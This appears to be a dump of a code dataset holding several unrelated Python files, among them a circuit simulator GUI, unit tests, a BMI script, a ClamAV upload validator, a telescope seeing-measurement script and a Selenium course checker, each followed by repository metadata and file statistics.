This is a way to allow users to ignore the underlying module
"""
self._top.AddMux41(pos, out, c0, c1, d0, d1, d2, d3)
def AddTff(self, pos, q, t, clk, rst = None, s = None):
""" Create a T Flip-Flop
This is a way to allow users to ignore the underlying module
"""
self._top.AddTff(pos, q, t, clk, rst = None, s = None)
def AddDff(self, pos, q, d, clk, rst = None, s = None):
""" Create a D Flip-Flop
This is a way to allow users to ignore the underlying module
"""
self._top.AddDff(pos, q, d, clk, rst = None, s = None)
# TODO Add Counter and Add Decoder
def AddModule(self, module, pos, name):
""" Add a module
This is a way to allow users to ignore the underlying module
"""
self._top.AddModule(module, pos, name)
# map it for lookup by shape object
self._moduleMap[module.GetShape()] = module
def Start(self):
""" Initialize and start the simulator """
# we have deferred adding anything to the canvas until now
self._top.Render()
self._canvas.ConnectAllWires()
# this will build a list of lists, from highest to lowest level
# of modules so we can show/hide them all
self._moduleHierarchy.append([]) # empty top node
self._buildHierarchy(self._top, 1)
self._displayDepth = len(self._moduleHierarchy) - 1
# we need a trick to run the simulator and the main loop...
def EventLoop():
@instance
def inst():
while(self._frame and not self._frame.IsExit()):
yield delay(1)
self._frame.GetStatusBar().SetFields(["Simulation step: " + str(now())])
self._refresh()
self._app.MainLoop()
else:
self._timer.stop()
raise StopSimulation
return inst
event_loop_runner = EventLoop()
# grab top module
self._instances.append(self._top.GetInstances())
self._instances.append(event_loop_runner)
self._simulator = Simulation(*self._instances)
self._simulator.run()
def _buildHierarchy(self, module, level):
""" Recursive calls to build the module hierarchy list
This is used for module showing/hiding by depth
"""
for m in module.GetModules():
if level + 1 > len(self._moduleHierarchy):
self._moduleHierarchy.append([])
self._moduleHierarchy[level].append(m)
self._buildHierarchy(m, level + 1)
def OnTimer(self, e):
""" Handle timing simulation
"""
if not self._pause:
self._app.ExitMainLoop()
def OnKey(self, e):
""" Switch toggling by keypress
Also handles "zooming" level of detail to display
"""
key = e.GetKeyCode()
map = self._signalMap
if (key in map):
map[key].Toggle()
self._app.ExitMainLoop()
elif key in [wx.WXK_PRIOR, wx.WXK_PAGEUP]:
tempDepth = max([self._displayDepth - 1, 0])
if (tempDepth != self._displayDepth):
for m in self._moduleHierarchy[self._displayDepth]:
m.ShowDetails(False)
self._displayDepth = tempDepth
self._refresh()
elif key in [wx.WXK_NEXT, wx.WXK_PAGEDOWN]:
tempDepth = min([self._displayDepth + 1, len(self._moduleHierarchy) - 1])
if (tempDepth != self._displayDepth):
for m in self._moduleHierarchy[tempDepth]:
m.ShowDetails(True)
self._displayDepth = tempDepth
self._refresh()
def GetFrame(self):
""" Get the frame for event firing
"""
return self._frame
def _refresh(self):
""" Refresh the canvas after updating signal shapes
"""
for s in self._signals:
s.Update()
self._top.Update()
self._canvas.Refresh(False)
def Init():
app = wx.App(False)
manager = Manager(app)
ogl.OGLInitialize()
return manager
| 33.353952 | 92 | 0.571914 | 1,209 | 9,706 | 4.498759 | 0.234905 | 0.023166 | 0.018018 | 0.01765 | 0.329472 | 0.305939 | 0.305939 | 0.289024 | 0.267696 | 0.242692 | 0 | 0.007995 | 0.329899 | 9,706 | 290 | 93 | 33.468966 | 0.82826 | 0.268082 | 0 | 0.132867 | 0 | 0 | 0.003212 | 0 | 0 | 0 | 0 | 0.013793 | 0 | 1 | 0.188811 | false | 0 | 0.041958 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca713885917f88c7111540d8832e21eb26208818 | 1,438 | py | Python | tests/src/dirac_notation/test_bra.py | KaroliShp/Quantumformatics | 4166448706c06a1a45abd106da8152b4f4c40a25 | [
"MIT"
] | 2 | 2019-10-28T20:26:14.000Z | 2019-10-29T08:28:45.000Z | tests/src/dirac_notation/test_bra.py | KaroliShp/Quantumformatics | 4166448706c06a1a45abd106da8152b4f4c40a25 | [
"MIT"
] | 3 | 2019-10-28T09:19:27.000Z | 2019-10-28T13:42:08.000Z | tests/src/dirac_notation/test_bra.py | KaroliShp/Quantumformatics | 4166448706c06a1a45abd106da8152b4f4c40a25 | [
"MIT"
] | null | null | null | import pytest
from pytest_mock import mocker
from hamcrest import *
import numpy as np
from src.dirac_notation.ket import Ket
from src.dirac_notation.bra import Bra
from src.dirac_notation.matrix import Matrix
@pytest.mark.parametrize('input_1,input_2,expected_output_1,expected_output_2', [
(
Bra([1,1]),
[
Bra([1,0]), Bra([0,1])
],
True,
[
1, 1
]
), (
Bra([1,1]),
[
Bra([1,0]), Bra([2,0])
],
False, 0
)
])
def test_linear_combination(input_1, input_2, expected_output_1, expected_output_2):
output = input_1.linear_combination(input_2)
assert_that(output[0], equal_to(expected_output_1))
np.testing.assert_array_equal(output[1], expected_output_2)
# Magic methods
@pytest.mark.parametrize('input_1,input_2,expected_output', [
(
Bra([1, 0]), Ket([1, 0]), 1
), (
Bra([0, 1]), Ket([1, 0]), 0
),(
Bra([1, 0]), Matrix([[1, 0],[0, 1]]), Bra([1, 0])
)
])
def test_mul(input_1, input_2, expected_output):
output = input_1 * input_2
assert_that(output, equal_to(expected_output))
@pytest.mark.parametrize('input_1,input_2,expected_output', [
(
Ket([1,0]), Bra([0, 1]), Matrix([[0, 1],[0, 0]])
)
])
def test_rmul(input_1, input_2, expected_output):
output = input_1 * input_2
assert_that(output, equal_to(expected_output)) | 24.372881 | 84 | 0.604312 | 209 | 1,438 | 3.904306 | 0.186603 | 0.205882 | 0.107843 | 0.117647 | 0.539216 | 0.474265 | 0.474265 | 0.442402 | 0.442402 | 0.301471 | 0 | 0.061355 | 0.240612 | 1,438 | 59 | 85 | 24.372881 | 0.685897 | 0.00904 | 0 | 0.326531 | 0 | 0 | 0.079354 | 0.079354 | 0 | 0 | 0 | 0 | 0.081633 | 1 | 0.061224 | false | 0 | 0.142857 | 0 | 0.204082 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca7a85095b1b2b5b29546e3e20953394398b0936 | 297 | py | Python | bmi.py | manmik2323/lifeisawesome.online | 286b6a252c58d4751f07c28a343343a8fbb862fc | [
"CC-BY-3.0"
] | null | null | null | bmi.py | manmik2323/lifeisawesome.online | 286b6a252c58d4751f07c28a343343a8fbb862fc | [
"CC-BY-3.0"
] | null | null | null | bmi.py | manmik2323/lifeisawesome.online | 286b6a252c58d4751f07c28a343343a8fbb862fc | [
"CC-BY-3.0"
] | null | null | null | import cgitb
cgitb.enable()
print("This is a simple BMI convertor")
weight = float(input("Enter weight in pounds: "))
height = float(input("Enter height in inches: "))
weight_kg = weight / 2.205 # pounds to kg
height_m = height / 39.37
BMI = weight_kg / (height_m ** 2)
print(f'BMI is {BMI:.2f}')
| 29.7 | 49 | 0.693603 | 50 | 297 | 4.04 | 0.54 | 0.09901 | 0.148515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.158249 | 297 | 9 | 50 | 33 | 0.768 | 0.040404 | 0 | 0 | 0 | 0 | 0.332155 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca891eab678acc220da14e7299f6f382535e0a94 | 1,910 | py | Python | BI-IOS/semester-project/webapp/beecon/campaigns/libs/cinemas/mvMovieSchedules.py | josefdolezal/fit-cvut | 6b6abea4232b946246d33290718d6c5007926b63 | [
"MIT"
] | 20 | 2016-05-15T10:39:53.000Z | 2022-03-29T00:06:06.000Z | BI-IOS/semester-project/webapp/beecon/campaigns/libs/cinemas/mvMovieSchedules.py | josefdolezal/fit-cvut | 6b6abea4232b946246d33290718d6c5007926b63 | [
"MIT"
] | 3 | 2017-05-27T16:44:01.000Z | 2019-01-02T21:02:59.000Z | BI-IOS/semester-project/webapp/beecon/campaigns/libs/cinemas/mvMovieSchedules.py | josefdolezal/fit-cvut | 6b6abea4232b946246d33290718d6c5007926b63 | [
"MIT"
] | 11 | 2018-08-22T21:16:32.000Z | 2021-04-10T22:42:34.000Z | # -*- coding: utf-8 -*-
from DataSource import CinemaCity
from bs4 import BeautifulSoup
from datetime import datetime
import re
class MovieSchedule:
def __init__( self, url, date ):
self.url = url
self._load_schedule()
def closest_movies( self ):
print( self.movies )
def _load_schedule( self ):
cc = CinemaCity( self. url )
self._parse_schedule( cc.movie_schedule() )
def _parse_schedule( self, html ):
soup = BeautifulSoup( html, 'html.parser' )
movies = soup.find_all( 'tr' )
self.movies = [ Movie( movie ) for movie in movies if movie.td ]
class Movie:
def __init__( self, soup ):
self._remove_empty_elements( soup )
self._parse_input( soup )
def __str__( self ):
return self.to_json()
def __repr__( self ):
return self.to_json()
def to_json( self ):
js = '{'
js += '"name":"{}", "pg":"{}", "type":"{}", '.format(
self.name, self.pg, self.mtype )
js += '"language":"{}", "duration":"{}", '.format(
self.language, self.duration )
js += '"showtimes":{}'.format( self._showtimes_to_json() )
js += '}'
return js
def _parse_input( self, soup ):
self.name = soup.td.extract().a.string
self.pg = soup.td.extract().string
self.mtype = soup.td.extract().string
self.language = soup.td.extract().string
self.duration = soup.td.extract().string
self._setup_showtimes( soup )
def _remove_empty_elements( self, soup ):
for el in soup.find_all( 'td' ):
if not el.contents:
el.extract()
def _setup_showtimes( self, soup ):
self.showtimes = [ datetime.strptime( e.a.string.strip(), '%H:%M' ).time() for e in soup.find_all( 'td' ) ]
def _showtimes_to_json( self ):
js = '['
for show in self.showtimes:
if show is not self.showtimes[0]:
js += ', '
js += '"{}"'.format( show.strftime( '%H:%M' ) )
js += ']'
return js
| 25.466667 | 111 | 0.611518 | 250 | 1,910 | 4.464 | 0.284 | 0.026882 | 0.058244 | 0.0681 | 0.150538 | 0.041219 | 0 | 0 | 0 | 0 | 0 | 0.002037 | 0.228796 | 1,910 | 74 | 112 | 25.810811 | 0.755601 | 0.010995 | 0 | 0.072727 | 0 | 0 | 0.064653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.218182 | false | 0 | 0.072727 | 0.036364 | 0.4 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca8c2762f3fbfac9e880ce9182c81186e49f9ea1 | 2,305 | py | Python | django_fileuploadvalidation/modules/validation/validator.py | IV1T3/django-middleware-fileuploadvalidation | 7396702415a623424e3e790edc2f5dd51041d908 | [
"Apache-2.0"
] | null | null | null | django_fileuploadvalidation/modules/validation/validator.py | IV1T3/django-middleware-fileuploadvalidation | 7396702415a623424e3e790edc2f5dd51041d908 | [
"Apache-2.0"
] | 34 | 2021-07-22T14:43:20.000Z | 2022-03-14T08:40:49.000Z | django_fileuploadvalidation/modules/validation/validator.py | IV1T3/django-middleware-fileuploadvalidation | 7396702415a623424e3e790edc2f5dd51041d908 | [
"Apache-2.0"
] | null | null | null | import clamd
import logging
from io import BytesIO
from . import basic, image, quicksand
def get_clamAV_results(file_object):
# Connects to UNIX socket on /var/run/clamav/clamd.ctl
clam_daemon = clamd.ClamdUnixSocket()
clamd_res = clam_daemon.instream(BytesIO(file_object.content))
return clamd_res["stream"][0]
def validate(files, upload_config):
logging.debug("[Validation module] - Starting validation")
block_upload = False
for file_name, file in files.items():
if not block_upload:
if upload_config["clamav"]:
clamav_res = get_clamAV_results(file)
malicious = clamav_res == "FOUND"
if malicious:
block_upload = True
file.block = True
file.append_block_reason("ClamAV_detection")
logging.warning(
f"{file.basic_information.name} [Validation module] - Blocking file: ClamAV detection"
)
if not file.block:
# Perform basic file validation
file = basic.validate_file(file, upload_config)
if not file.block:
# Perform quicksand scan
file = quicksand.validate_file(file, upload_config)
# Get guessed file type
file_type = file.detection_results.guessed_mime
# Perform file type specific validation
if file_type.startswith("application"):
pass
elif file_type.startswith("audio"):
pass
elif file_type.startswith("image"):
file = image.validate_file(file)
elif file_type.startswith("text"):
pass
# elif file_type.startswith("video"):
# file = video.validate_file(file)
# else:
# file = image.validate_file(file)
logging.debug(
f"[Validation module] - Current block status: {file.block} => {file.block_reasons}"
)
if file.block:
block_upload = True
return files, block_upload
| 32.464789 | 110 | 0.536659 | 225 | 2,305 | 5.32 | 0.333333 | 0.053467 | 0.066834 | 0.073517 | 0.188805 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00071 | 0.38872 | 2,305 | 70 | 111 | 32.928571 | 0.848829 | 0.121475 | 0 | 0.166667 | 0 | 0 | 0.130025 | 0.014392 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.071429 | 0.095238 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ca93f06b436cc477a9fe3786cd6aa0d7c14c1cf3 | 1,861 | py | Python | 001146StepikPyBegin/Stepik001146PyBeginсh11p06st07TASK03_20210311_lists_methods.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh11p06st07TASK03_20210311_lists_methods.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh11p06st07TASK03_20210311_lists_methods.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | import string
def onlyletters(s):
s1 = []
for i in s:
if i not in string.punctuation: # проверяем посимвольно, есть ли в списке пунктуационных знаков
s1.append(i)
s2 = ''.join(s1) # соединяем массив символов в слово
return s2
words = (input().lower()).split() # преобразуем слова на этапе ввода
words_opt = [] # создаем оптимизированный список
for item in words:
words_opt.append(onlyletters(item))
count1 = words_opt.count('a') + words_opt.count('an') + words_opt.count('the')
print(f'Общее количество артиклей {count1}')
# my_02
words = (input().lower()).split()
count1 = words.count('a') + words.count('an') + words.count('the')
print(f'Общее количество артиклей {count1}')
# f01
print('Общее количество артиклей:', sum([1 for i in input().split() if i.lower() in ('a', 'an', 'the')]))
# f2
print('Общее количество артиклей:', len([i for i in input().split() if i.lower() in ('a', 'an', 'the')]))
# f3
print(f"Общее количество артиклей: {len([i for i in input().split() if i.lower() in ['a', 'an', 'the']])}")
# f4
s = input().lower().split()
count = [s.count('a'), s.count('an'), s.count('the')]
count = sum(count)
print(f'Общее количество артиклей: {count}')
# f5
ss = input().lower().split()
print('Общее количество артиклей:', sum(ss.count(article) for article in ('a', 'an', 'the')))
# f6
s, cnt = input().lower().split(), 0
articles = ['a', 'an', 'the']
for word in s:
if word in articles:
cnt += 1
print("Общее количество артиклей:", cnt)
# f7
# put your python code here
l = input().lower()
count = 0
for i in l.split(' '):
if i == 'a' or i == 'an' or i == 'the':
count += 1
print('Общее количество артиклей:', count)
# f8
from re import findall
txt = input().lower()
res = findall(r'\ba\b|\ban\b|\bthe\b', txt)
print(f"Общее количество артиклей: {len(res)}")
# f9
| 26.211268 | 107 | 0.626008 | 286 | 1,861 | 4.052448 | 0.311189 | 0.129422 | 0.198447 | 0.090595 | 0.36497 | 0.236411 | 0.203624 | 0.203624 | 0.129422 | 0.129422 | 0 | 0.017027 | 0.179473 | 1,861 | 70 | 108 | 26.585714 | 0.741978 | 0.118216 | 0 | 0.095238 | 0 | 0.02381 | 0.267857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.047619 | 0 | 0.095238 | 0.238095 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca968827ae8ca82e5994b430fbeebecd32c70e99 | 1,027 | py | Python | setup.py | schyczewski/electrum-sum-server | 3e78c225290e8b21dc59e14aac5df7c6d99e0d8c | [
"MIT"
] | null | null | null | setup.py | schyczewski/electrum-sum-server | 3e78c225290e8b21dc59e14aac5df7c6d99e0d8c | [
"MIT"
] | null | null | null | setup.py | schyczewski/electrum-sum-server | 3e78c225290e8b21dc59e14aac5df7c6d99e0d8c | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name="electrum-sum-server",
version="1.0",
scripts=['run_electrum_sum_server.py','electrum-sum-server'],
install_requires=['plyvel','jsonrpclib', 'irc >= 11, <=14.0'],
package_dir={
'electrumsumserver':'src'
},
py_modules=[
'electrumsumserver.__init__',
'electrumsumserver.utils',
'electrumsumserver.storage',
'electrumsumserver.deserialize',
'electrumsumserver.networks',
'electrumsumserver.blockchain_processor',
'electrumsumserver.server_processor',
'electrumsumserver.processor',
'electrumsumserver.version',
'electrumsumserver.ircthread',
'electrumsumserver.stratum_tcp'
],
description="Sumcoin Electrum Server",
author="Thomas Voegtlin",
author_email="thomasv@electrum.org",
license="MIT Licence",
url="https://github.com/pooler/electrum-sum-server/",
long_description="""Server for the Electrum Lightweight Sumcoin Wallet"""
)
| 33.129032 | 77 | 0.668939 | 92 | 1,027 | 7.304348 | 0.619565 | 0.065476 | 0.10119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008495 | 0.197663 | 1,027 | 30 | 78 | 34.233333 | 0.807039 | 0 | 0 | 0 | 0 | 0 | 0.578384 | 0.326193 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca99e20a87727779716fbe845133ce076ca3fec6 | 997 | py | Python | dimsim/tests/test_dimsim.py | NTHU-NLPLAB/DimSim | c851d76c228088ee84064c5bda2ca3ef9feb34dd | [
"Apache-2.0"
] | null | null | null | dimsim/tests/test_dimsim.py | NTHU-NLPLAB/DimSim | c851d76c228088ee84064c5bda2ca3ef9feb34dd | [
"Apache-2.0"
] | null | null | null | dimsim/tests/test_dimsim.py | NTHU-NLPLAB/DimSim | c851d76c228088ee84064c5bda2ca3ef9feb34dd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Dependencies
import pytest
# The module to test
from dimsim.core.model import get_distance, get_candidates
def test_distance_near():
dist = get_distance(u'大侠', u'大虾')
assert dist == 0.0002380952380952381
def test_distance_far():
dist = get_distance(u'大侠', u'大人')
assert dist == 25.001417183349876
def test_distance_pinyin():
dist = get_distance(['da4', 'xia2'], ['da4', 'xia1'], pinyin=True)
assert dist == 0.0002380952380952381
def test_invalid_input():
pytest.raises(AssertionError, get_distance, u'大侠', u'大')
def test_get_candidates_simplified():
candidates = get_candidates(u'大侠', mode='simplified', theta=1)
for c in candidates:
assert c in [u'打下', u'大虾', u'大侠']
def test_get_candidates_traditional():
candidates = get_candidates(u'粉丝', mode='traditional', theta=1)
for c in candidates:
assert c in [u'門市', u'分時', u'焚屍', u'粉飾', u'粉絲']
if __name__ == '__main__':
pytest.main([__file__])
| 23.186047 | 70 | 0.673019 | 143 | 997 | 4.454545 | 0.412587 | 0.065934 | 0.070644 | 0.065934 | 0.299843 | 0.276295 | 0.100471 | 0.100471 | 0.100471 | 0.100471 | 0 | 0.07824 | 0.179539 | 997 | 42 | 71 | 23.738095 | 0.700489 | 0.053159 | 0 | 0.173913 | 0 | 0 | 0.078723 | 0 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.26087 | false | 0 | 0.086957 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca9c42a3546a2a31de0428c29562026775458eb1 | 3,812 | py | Python | run_measure_seeing.py | marissakotze/timDIMM | dde00a3bb6ca7c3d9b71e24f9363350a0e2a323f | [
"BSD-3-Clause"
] | 1 | 2021-06-06T15:26:36.000Z | 2021-06-06T15:26:36.000Z | run_measure_seeing.py | marissakotze/timDIMM | dde00a3bb6ca7c3d9b71e24f9363350a0e2a323f | [
"BSD-3-Clause"
] | null | null | null | run_measure_seeing.py | marissakotze/timDIMM | dde00a3bb6ca7c3d9b71e24f9363350a0e2a323f | [
"BSD-3-Clause"
] | 3 | 2015-07-29T15:16:35.000Z | 2017-12-01T13:02:36.000Z | #!/usr/bin/env python
import os, shutil
import datetime
import ox_wagon
import pick_star
from find_boxes import find_boxes
from guide_gto900 import guide_gto900
from pygto900 import GTO900, status
from spiral_search_gto900 import spiralsearch
import time
import sys
old_star = None
repeat = 1
niter = 15
spiral_log = '/home/massdimm/spiral.log'
while True:
#kill any existing running camera programs
os.system('pkill ave_frames')
os.system('pkill measure_seeing')
time.sleep(5)
#Make sure the ox wagon is open
try:
ox=ox_wagon.OxWagon()
ox=ox.open()
except Exception,e:
print Exception
print 'Could not give open command to Ox Wagon'
pass
#Display telescope status
#os.system('./pygto900.py status')
#time.sleep(30)
#Warning if telescope is pointing too low
with GTO900() as g:
alt = g.alt()
if alt<=30.0:
print '!!!WARNING: Telescope is at an altitude lower than 30 degrees !!!'
print 'Seeing measurements will not start'
print 'YOU MAY WANT TO CHECK THE TELESCOPE ALIGNMENT AND POINTING BEFORE STARTING MEASUREMENTS'
g.park_mode()
sys.exit()
else:
print 'Telescope position checked'
#pick the star
try:
pick_star.pick_star(g)
except Exception, e:
print Exception
print 'Could not pick new star because %s' % e
print 'WARNING: YOU MAY WANT TO STOP MEASUREMENT AND START AGAIN'
g.park_mode()
exit()
#check to see if the star is available
os.system('./ave_frames 10 \!center.fits')
nstars = find_boxes('center.fits')
if nstars < 2:
nfound, sx, sy = spiralsearch(g,niter=niter)
sout = open(spiral_log, 'a')
sout.write('%s %i %i %i\n' % (datetime.datetime.now(), sx, sy, nfound))
sout.close()
if nfound == -1:
print 'Could not find stars in %i iterations' % niter
g.park_mode()
os.system('./ave_frames 10 \!center.fits')
nstars = find_boxes('center.fits')
#start turbina running
try:
current_star=open('current_object').read().strip()
except:
old_star = None
if (old_star is None) or (old_star != current_star):
#os.system('./run_turbina.py')
old_star = current_star
#display star and log information
os.system('cat center.fits | xpaset timDIMM fits')
os.system('./pygto900.py log >> gto900.log')
#measure star -- changed this d wn to 1000 from 10000
os.system("./measure_seeing 10000 `tail -1 gto900.log | cut -d ' ' -f 7` `cat exptime`")
# adjust the guiding
guide_gto900()
#update the documents
if os.path.isfile('seeing.out'):
t=datetime.datetime.now()
centroid_file='centroids_%s.dat' % t.strftime('%Y%m%d-%H%M%S')
shutil.move('centroids.dat', 'data/%s' % centroid_file)
os.chdir('data')
os.system('../dimm_stats.py %s' % centroid_file)
os.chdir('../')
os.system('echo "image;text 25 5 # text={Seeing = `cat seeing.out`}" | xpaset timDIMM regions')
os.system('echo "image;text 290 5 # text={R0 = `cat r0.out` cm}" | xpaset timDIMM regions')
#this is needed for the ELS viewer
os.system("date +'%Y-%m-%dT%H:%M:%S%z' >> seeing.out")
os.system("mv seeing.out seeing.txt")
#os.system("scp seeing.txt timdimm@timdimm:/Users/timdimm/Sites/")
pass
else:
print "FAIL!"
os.system('echo "image;text 125 5 # text={Unsuccessful Measurement}" | xpaset timDIMM regions')
if os.path.isfile('centroids.dat'): os.remove('centroids.dat')
if os.path.isfile('seeing.out'): os.remove('seeing.out')
| 30.99187 | 106 | 0.612802 | 526 | 3,812 | 4.36692 | 0.372624 | 0.055725 | 0.016979 | 0.018285 | 0.149325 | 0.104484 | 0.084458 | 0.084458 | 0.047018 | 0.047018 | 0 | 0.028255 | 0.266527 | 3,812 | 122 | 107 | 31.245902 | 0.793276 | 0.137198 | 0 | 0.243902 | 0 | 0.036585 | 0.346883 | 0.014364 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.02439 | 0.121951 | null | null | 0.134146 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0465d285875f7341d40eda1201940586861d778c | 3,325 | py | Python | checker.py | nautilusPrime/howdy_checker | e2dfc2962a54d93d62d1f7dcc1b4690bd1760c95 | [
"Unlicense"
] | null | null | null | checker.py | nautilusPrime/howdy_checker | e2dfc2962a54d93d62d1f7dcc1b4690bd1760c95 | [
"Unlicense"
] | null | null | null | checker.py | nautilusPrime/howdy_checker | e2dfc2962a54d93d62d1f7dcc1b4690bd1760c95 | [
"Unlicense"
] | null | null | null |
# coding: utf-8
# author: Ankur Roy Chowdhury
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
class HowdyChecker():
def __init__(self, howdy_site=None, output_file=None, chrome_driver_path='/usr/local/bin/chromedriver'):
self.HOWDY_SITE = howdy_site
self.OUTPUT_FILE = output_file
opt = webdriver.chrome.options.Options()
opt.set_headless()
self.driver = webdriver.Chrome(
executable_path=chrome_driver_path, options=opt)
self.driver.implicitly_wait(30)
# driver.maximize_window()
def login(self, uname=None, passwd=None):
self.driver.get(self.HOWDY_SITE)
login_button = self.driver.find_element_by_id("loginbtn")
login_button.click()
username_field = self.driver.find_element_by_id('username')
username_field.send_keys(uname)
username_field.submit()
password_field = self.driver.find_element_by_id('password')
password_field.send_keys(passwd)
password_field.submit()
def check_course(self, term=None, subject=None, course=None):
self.TERM = term
self.SUBJECT = subject
self.COURSE = course
class_search_link = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located(
(By.XPATH, '//*[@id="portlet_u31l1n51"]/div/span[1]/div/a')))
class_search_link.click()
# self.driver.switch_to.frame(0)
WebDriverWait(self.driver, 10).until(
EC.frame_to_be_available_and_switch_to_it((By.TAG_NAME, 'iframe')))
select = Select(self.driver.find_element_by_id('term_input_id'))
select.select_by_visible_text(self.TERM)
self.driver.find_element_by_xpath(
'/html/body/div[3]/form/input').submit()
select = Select(self.driver.find_element_by_id('subj_id'))
select.select_by_value(self.SUBJECT)
self.driver.find_element_by_xpath(
'//*[@id="courseBtnDiv"]/input[2]').click()
course_view_btn = self.driver.find_elements_by_xpath(
"//input[../../../td=" + self.COURSE + "]")
course_view_btn[-1].click()
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located(
(By.XPATH, "//input[@value='Register']")))
course_sections = self.driver.find_elements_by_class_name('datadisplaytable')[
0]
course_content = course_sections.get_attribute('innerHTML')
#print course_content
return course_content
def compare_contents(self, current_content=None):
previous_contents = ''
changed = False
with open(self.OUTPUT_FILE, 'r') as f:
previous_contents = f.read()
if previous_contents == current_content:
changed = False
else:
changed = True
with open(self.OUTPUT_FILE, 'w') as f:
f.write(current_content)
return changed, current_content, previous_contents
def __del__(self):
self.driver.quit()
| 31.971154 | 108 | 0.668571 | 410 | 3,325 | 5.14878 | 0.331707 | 0.080531 | 0.059687 | 0.069635 | 0.254382 | 0.210801 | 0.123164 | 0.094742 | 0.059687 | 0.059687 | 0 | 0.007719 | 0.220752 | 3,325 | 103 | 109 | 32.281553 | 0.807024 | 0.035188 | 0 | 0.060606 | 0 | 0 | 0.079975 | 0.04936 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075758 | false | 0.060606 | 0.106061 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
046adc53c7fe3e03006b675d1e1ef4fb8a9ffa29 | 924 | py | Python | src/airflow_fs/sensors.py | Sergfalt/airflow-fs | b1e09035242b4feb70faf1626a12d6078d0883c1 | [
"MIT"
